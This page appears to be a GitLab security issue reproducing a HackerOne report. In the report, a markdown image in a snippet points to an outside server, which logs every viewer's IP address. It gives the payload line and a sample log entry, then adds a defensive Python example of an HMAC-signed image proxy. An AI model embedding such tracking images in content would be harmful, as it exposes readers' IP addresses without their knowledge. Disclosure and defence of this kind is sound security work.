
We steal the ip addresses of those who came to our snippet.

HackerOne report #457659 by iframe on 2018-12-06:

Hello, I found a vulnerability that allows stealing the IP addresses of those who visit our snippet, using a malicious image upload.

  1. Create a snippet
  2. Insert into the editor: ![test](https://filecat.ru/xss/)
  3. Save

test.png

A ping will come to my server:

[https://gitlab.com/] New view from <REDACTED IP> at Friday 7th of December 2018 00:14:37

Impact

We steal the ip addresses of those who came to our snippet.
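The leak happens because the rendered markdown sends each viewer's browser straight to the external host named in the image link, so that host logs the viewer's address. One defensive pattern for this is a Camo-style signed image proxy: the renderer rewrites every external image URL to point at a proxy endpoint, signs it with an HMAC so only renderer-produced paths are honoured, and the proxy fetches the image on the viewer's behalf. The following is an added example written for this page; it is not GitLab's code and not the reporter's. The proxy host, the shared secret and the list of internal hosts are assumed placeholder values.

```python
"""Camo-style image proxying for rendered markdown (added example, not GitLab's code).

External image URLs are rewritten to a proxy endpoint carrying an HMAC-SHA256
digest, so the viewer's browser only ever talks to the proxy. The proxy side
verifies the digest before fetching, so it cannot be used as an open relay.
"""
import hashlib
import hmac
import re
from urllib.parse import urlparse

# Assumed deployment values (hypothetical): the proxy host, a secret shared only
# between the markdown renderer and the proxy, and the site's own host(s).
PROXY_BASE = "https://assets-proxy.example.invalid"
PROXY_SECRET = b"replace-with-a-long-random-secret"
INTERNAL_HOSTS = {"gitlab.example.invalid"}

# Markdown image syntax: ![alt](url)
IMG_RE = re.compile(r"!\[([^\]]*)\]\(([^)\s]+)\)")


def is_external(url: str) -> bool:
    """True when loading this URL would make the viewer's browser contact a
    third-party host. Relative paths and data: URLs involve no network fetch;
    protocol-relative URLs (//host/x.png) are external and are caught here too."""
    parsed = urlparse(url)
    if not parsed.netloc:
        return False
    return parsed.hostname not in INTERNAL_HOSTS


def proxied_url(url: str) -> str:
    """Renderer side: sign the original URL and embed it (hex-encoded) in a proxy path."""
    digest = hmac.new(PROXY_SECRET, url.encode(), hashlib.sha256).hexdigest()
    return f"{PROXY_BASE}/{digest}/{url.encode().hex()}"


def rewrite_images(markdown: str) -> str:
    """Rewrite every external image reference in the markdown to go via the proxy."""
    def repl(match: re.Match) -> str:
        alt, url = match.group(1), match.group(2)
        if is_external(url):
            return f"![{alt}]({proxied_url(url)})"
        return match.group(0)
    return IMG_RE.sub(repl, markdown)


def decode_proxy_path(path: str):
    """Proxy side: recover the original URL only if the digest matches.
    Returns the URL, or None when the path is malformed or unsigned."""
    parts = path.strip("/").split("/")
    if len(parts) != 2:
        return None
    digest, hex_url = parts
    try:
        url = bytes.fromhex(hex_url).decode()
    except ValueError:
        return None
    expected = hmac.new(PROXY_SECRET, url.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(digest, expected):
        return None
    return url


if __name__ == "__main__":
    # Constructed sample: the image from the report plus an internal and a relative one.
    sample = ("![test](https://filecat.ru/xss/) "
              "![own](https://gitlab.example.invalid/u.png) "
              "![rel](test.png)")
    print(rewrite_images(sample))
```

With this in place the external host in the report only ever sees requests from the proxy, never from the people viewing the snippet; the digest check on the proxy side is what stops the endpoint from being turned into a general-purpose fetcher.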

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

Security Issue

https://dev.gitlab.org/gitlab/gitlabhq/issues/2812

Edited by Jeremy Matos